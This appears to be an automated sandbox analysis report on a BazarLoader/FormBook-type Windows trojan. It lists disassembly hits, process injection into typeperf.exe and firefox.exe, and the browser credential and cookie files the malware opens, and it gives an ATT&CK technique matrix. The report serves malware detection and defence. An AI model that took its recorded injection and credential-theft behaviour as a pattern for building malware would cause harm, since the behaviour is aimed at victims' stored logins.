            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A845B1 mov eax, dword ptr fs:[00000030h]5_2_00A845B1
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A845B1 mov eax, dword ptr fs:[00000030h]5_2_00A845B1
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A94588 mov eax, dword ptr fs:[00000030h]5_2_00A94588
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A62582 mov eax, dword ptr fs:[00000030h]5_2_00A62582
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A62582 mov ecx, dword ptr fs:[00000030h]5_2_00A62582
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9E59C mov eax, dword ptr fs:[00000030h]5_2_00A9E59C
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9C5ED mov eax, dword ptr fs:[00000030h]5_2_00A9C5ED
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9C5ED mov eax, dword ptr fs:[00000030h]5_2_00A9C5ED
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A625E0 mov eax, dword ptr fs:[00000030h]5_2_00A625E0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8E5E7 mov eax, dword ptr fs:[00000030h]5_2_00A8E5E7
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8E5E7 mov eax, dword ptr fs:[00000030h]5_2_00A8E5E7
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8E5E7 mov eax, dword ptr fs:[00000030h]5_2_00A8E5E7
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8E5E7 mov eax, dword ptr fs:[00000030h]5_2_00A8E5E7
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8E5E7 mov eax, dword ptr fs:[00000030h]5_2_00A8E5E7
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8E5E7 mov eax, dword ptr fs:[00000030h]5_2_00A8E5E7
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8E5E7 mov eax, dword ptr fs:[00000030h]5_2_00A8E5E7
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8E5E7 mov eax, dword ptr fs:[00000030h]5_2_00A8E5E7
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9E5CF mov eax, dword ptr fs:[00000030h]5_2_00A9E5CF
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9E5CF mov eax, dword ptr fs:[00000030h]5_2_00A9E5CF
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A665D0 mov eax, dword ptr fs:[00000030h]5_2_00A665D0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9A5D0 mov eax, dword ptr fs:[00000030h]5_2_00A9A5D0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9A5D0 mov eax, dword ptr fs:[00000030h]5_2_00A9A5D0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A70535 mov eax, dword ptr fs:[00000030h]5_2_00A70535
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A70535 mov eax, dword ptr fs:[00000030h]5_2_00A70535
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A70535 mov eax, dword ptr fs:[00000030h]5_2_00A70535
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A70535 mov eax, dword ptr fs:[00000030h]5_2_00A70535
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A70535 mov eax, dword ptr fs:[00000030h]5_2_00A70535
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A70535 mov eax, dword ptr fs:[00000030h]5_2_00A70535
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8E53E mov eax, dword ptr fs:[00000030h]5_2_00A8E53E
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8E53E mov eax, dword ptr fs:[00000030h]5_2_00A8E53E
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8E53E mov eax, dword ptr fs:[00000030h]5_2_00A8E53E
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8E53E mov eax, dword ptr fs:[00000030h]5_2_00A8E53E
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8E53E mov eax, dword ptr fs:[00000030h]5_2_00A8E53E
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AF6500 mov eax, dword ptr fs:[00000030h]5_2_00AF6500
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B34500 mov eax, dword ptr fs:[00000030h]5_2_00B34500
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B34500 mov eax, dword ptr fs:[00000030h]5_2_00B34500
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B34500 mov eax, dword ptr fs:[00000030h]5_2_00B34500
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B34500 mov eax, dword ptr fs:[00000030h]5_2_00B34500
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B34500 mov eax, dword ptr fs:[00000030h]5_2_00B34500
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B34500 mov eax, dword ptr fs:[00000030h]5_2_00B34500
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B34500 mov eax, dword ptr fs:[00000030h]5_2_00B34500
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9656A mov eax, dword ptr fs:[00000030h]5_2_00A9656A
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9656A mov eax, dword ptr fs:[00000030h]5_2_00A9656A
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9656A mov eax, dword ptr fs:[00000030h]5_2_00A9656A
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A68550 mov eax, dword ptr fs:[00000030h]5_2_00A68550
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A68550 mov eax, dword ptr fs:[00000030h]5_2_00A68550
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9C6A6 mov eax, dword ptr fs:[00000030h]5_2_00A9C6A6
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A966B0 mov eax, dword ptr fs:[00000030h]5_2_00A966B0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A64690 mov eax, dword ptr fs:[00000030h]5_2_00A64690
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A64690 mov eax, dword ptr fs:[00000030h]5_2_00A64690
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00ADE6F2 mov eax, dword ptr fs:[00000030h]5_2_00ADE6F2
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00ADE6F2 mov eax, dword ptr fs:[00000030h]5_2_00ADE6F2
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00ADE6F2 mov eax, dword ptr fs:[00000030h]5_2_00ADE6F2
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00ADE6F2 mov eax, dword ptr fs:[00000030h]5_2_00ADE6F2
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE06F1 mov eax, dword ptr fs:[00000030h]5_2_00AE06F1
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE06F1 mov eax, dword ptr fs:[00000030h]5_2_00AE06F1
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9A6C7 mov ebx, dword ptr fs:[00000030h]5_2_00A9A6C7
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9A6C7 mov eax, dword ptr fs:[00000030h]5_2_00A9A6C7
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A7E627 mov eax, dword ptr fs:[00000030h]5_2_00A7E627
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A96620 mov eax, dword ptr fs:[00000030h]5_2_00A96620
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A98620 mov eax, dword ptr fs:[00000030h]5_2_00A98620
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6262C mov eax, dword ptr fs:[00000030h]5_2_00A6262C
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00ADE609 mov eax, dword ptr fs:[00000030h]5_2_00ADE609
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2619 mov eax, dword ptr fs:[00000030h]5_2_00AA2619
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9A660 mov eax, dword ptr fs:[00000030h]5_2_00A9A660
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9A660 mov eax, dword ptr fs:[00000030h]5_2_00A9A660
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B2866E mov eax, dword ptr fs:[00000030h]5_2_00B2866E
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B2866E mov eax, dword ptr fs:[00000030h]5_2_00B2866E
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A92674 mov eax, dword ptr fs:[00000030h]5_2_00A92674
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A7C640 mov eax, dword ptr fs:[00000030h]5_2_00A7C640
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A607AF mov eax, dword ptr fs:[00000030h]5_2_00A607AF
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B0678E mov eax, dword ptr fs:[00000030h]5_2_00B0678E
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A827ED mov eax, dword ptr fs:[00000030h]5_2_00A827ED
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A827ED mov eax, dword ptr fs:[00000030h]5_2_00A827ED
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A827ED mov eax, dword ptr fs:[00000030h]5_2_00A827ED
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AEE7E1 mov eax, dword ptr fs:[00000030h]5_2_00AEE7E1
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A647FB mov eax, dword ptr fs:[00000030h]5_2_00A647FB
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A647FB mov eax, dword ptr fs:[00000030h]5_2_00A647FB
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6C7C0 mov eax, dword ptr fs:[00000030h]5_2_00A6C7C0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE07C3 mov eax, dword ptr fs:[00000030h]5_2_00AE07C3
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9C720 mov eax, dword ptr fs:[00000030h]5_2_00A9C720
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9C720 mov eax, dword ptr fs:[00000030h]5_2_00A9C720
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9273C mov eax, dword ptr fs:[00000030h]5_2_00A9273C
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9273C mov ecx, dword ptr fs:[00000030h]5_2_00A9273C
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9273C mov eax, dword ptr fs:[00000030h]5_2_00A9273C
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00ADC730 mov eax, dword ptr fs:[00000030h]5_2_00ADC730
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9C700 mov eax, dword ptr fs:[00000030h]5_2_00A9C700
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A60710 mov eax, dword ptr fs:[00000030h]5_2_00A60710
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A90710 mov eax, dword ptr fs:[00000030h]5_2_00A90710
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A68770 mov eax, dword ptr fs:[00000030h]5_2_00A68770
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A70770 mov eax, dword ptr fs:[00000030h]5_2_00A70770
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A70770 mov eax, dword ptr fs:[00000030h]5_2_00A70770
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A70770 mov eax, dword ptr fs:[00000030h]5_2_00A70770
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A70770 mov eax, dword ptr fs:[00000030h]5_2_00A70770
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A70770 mov eax, dword ptr fs:[00000030h]5_2_00A70770
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A70770 mov eax, dword ptr fs:[00000030h]5_2_00A70770
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exe Code function: 2_2_004168A7 GetProcessHeap,2_2_004168A7
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exe Code function: 2_2_004130E4 SetUnhandledExceptionFilter,2_2_004130E4
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exe Code function: 2_2_00413115 SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00413115

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\SysWOW64\typeperf.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF6DE060000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exe Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\okawzsv.exe protection: execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exe Section loaded: unknown target: C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe protection: execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exe Section loaded: unknown target: C:\Windows\SysWOW64\typeperf.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\typeperf.exe Section loaded: unknown target: C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe protection: read write
            Source: C:\Windows\SysWOW64\typeperf.exe Section loaded: unknown target: C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\typeperf.exe Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\typeperf.exe Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\typeperf.exe Thread APC queued: target process: C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
            Source: C:\Windows\SysWOW64\typeperf.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF6DE060000
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exe Process created: C:\Users\user\AppData\Local\Temp\okawzsv.exe C:\Users\user\AppData\Local\Temp\okawzsv.exe
            Source: C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe Process created: C:\Windows\SysWOW64\typeperf.exe C:\Windows\SysWOW64\typeperf.exe
            Source: C:\Windows\SysWOW64\typeperf.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
            Source: zIlFieNVyhhCXAVrseNWP.exe, 0000000A.00000000.1350947161.0000000001450000.00000002.00000001.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000A.00000002.3734895314.0000000001450000.00000002.00000001.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735362141.00000000015F0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
            Source: zIlFieNVyhhCXAVrseNWP.exe, 0000000A.00000000.1350947161.0000000001450000.00000002.00000001.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000A.00000002.3734895314.0000000001450000.00000002.00000001.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735362141.00000000015F0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
            Source: zIlFieNVyhhCXAVrseNWP.exe, 0000000A.00000000.1350947161.0000000001450000.00000002.00000001.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000A.00000002.3734895314.0000000001450000.00000002.00000001.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735362141.00000000015F0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
            Source: zIlFieNVyhhCXAVrseNWP.exe, 0000000A.00000000.1350947161.0000000001450000.00000002.00000001.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000A.00000002.3734895314.0000000001450000.00000002.00000001.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735362141.00000000015F0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: yProgram Manager
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exe Code function: 2_2_0041672E cpuid 2_2_0041672E
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,2_2_004216EC
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,2_2_00414FFA
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_00419D79 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_00419D79
            Source: C:\Users\user\Desktop\BMhDm7YW62.exeCode function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004030FB

            Stealing of Sensitive Information

            Source: Yara matchFile source: 5.2.okawzsv.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.okawzsv.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1430436689.0000000000D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3735194669.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.3738071578.0000000004F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3735067782.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3735429878.0000000002B30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1430474798.0000000000E30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1278604538.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\typeperf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\typeperf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\typeperf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\typeperf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\typeperf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\typeperf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\typeperf.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\typeperf.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara matchFile source: 5.2.okawzsv.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.okawzsv.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1430436689.0000000000D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3735194669.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.3738071578.0000000004F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3735067782.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3735429878.0000000002B30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1430474798.0000000000E30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1278604538.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact | Resource Development | Reconnaissance
            Valid Accounts | 1 Native API | Path Interception | 412 Process Injection | 2 Virtualization/Sandbox Evasion | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Email Collection | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | 1 System Shutdown/Reboot | Acquire Infrastructure | Gather Victim Identity Information
            Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 412 Process Injection | LSASS Memory | 151 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | Exfiltration Over Bluetooth | 3 Ingress Tool Transfer | SIM Card Swap | Obtain Device Cloud Backups | Network Denial of Service | Domains | Credentials
            Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 2 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | Automated Exfiltration | 4 Non-Application Layer Protocol | | | Data Encrypted for Impact | DNS Server | Email Addresses
            Local Accounts | Cron | Login Hook | Login Hook | 3 Obfuscated Files or Information | NTDS | 2 Process Discovery | Distributed Component Object Model | 1 Clipboard Data | Traffic Duplication | 4 Application Layer Protocol | | | Data Destruction | Virtual Private Server | Employee Names
            Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Software Packing | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Scheduled Transfer | Fallback Channels | | | Data Encrypted for Impact | Server | Gather Victim Network Information
            Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Data Transfer Size Limits | Multiband Communication | | | Service Stop | Botnet | Domain Properties
            External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 26 System Information Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over C2 Channel | Commonly Used Port | | | Inhibit System Recovery | Web Services | DNS
            Behavior graph (ID: 1355500, Sample: BMhDm7YW62.exe, Startdate: 07/12/2023, Architecture: WINDOWS, Score: 100)
            Process chain: BMhDm7YW62.exe drops and starts okawzsv.exe (C:\Users\user\AppData\Local\...\okawzsv.exe, PE32), which starts a second okawzsv.exe; that process injects into zIlFieNVyhhCXAVrseNWP.exe, which starts typeperf.exe; typeperf.exe injects into zIlFieNVyhhCXAVrseNWP.exe and starts firefox.exe.

            Source | Detection | Scanner | Label | Link
            BMhDm7YW62.exe | 54% | ReversingLabs | Win32.Trojan.BazarLoader |

            Source | Detection | Scanner | Label | Link
            C:\Users\user\AppData\Local\Temp\okawzsv.exe | 100% | Joe Sandbox ML | |
            C:\Users\user\AppData\Local\Temp\okawzsv.exe | 65% | ReversingLabs | Win32.Trojan.BazarLoader |
            No Antivirus matches
            No Antivirus matches
                                                              NameSourceMaliciousAntivirus DetectionReputation
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
Joe Sandbox version: 38.0.0 Ammolite
Analysis ID: 1355500
Start date and time: 2023-12-07 15:51:27 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 17s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: BMhDm7YW62.exe (renamed because original name is a hash value)
Original Sample Name: 3cc5b7aa1246d1f0bce5ffcabaa0525c40214012fc13998c711ac741ae71d4ce.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@9/3@20/13
EGA Information:
• Successful, ratio: 80%
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 113
• Number of non-executed functions: 131
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• VT rate limit hit for: BMhDm7YW62.exe
Time | Type | Description
15:53:10 | API Interceptor | 10469222x Sleep call for process: typeperf.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                      qWmFFs9EQd.exeGet hashmaliciousFormBook, NSISDropperBrowse
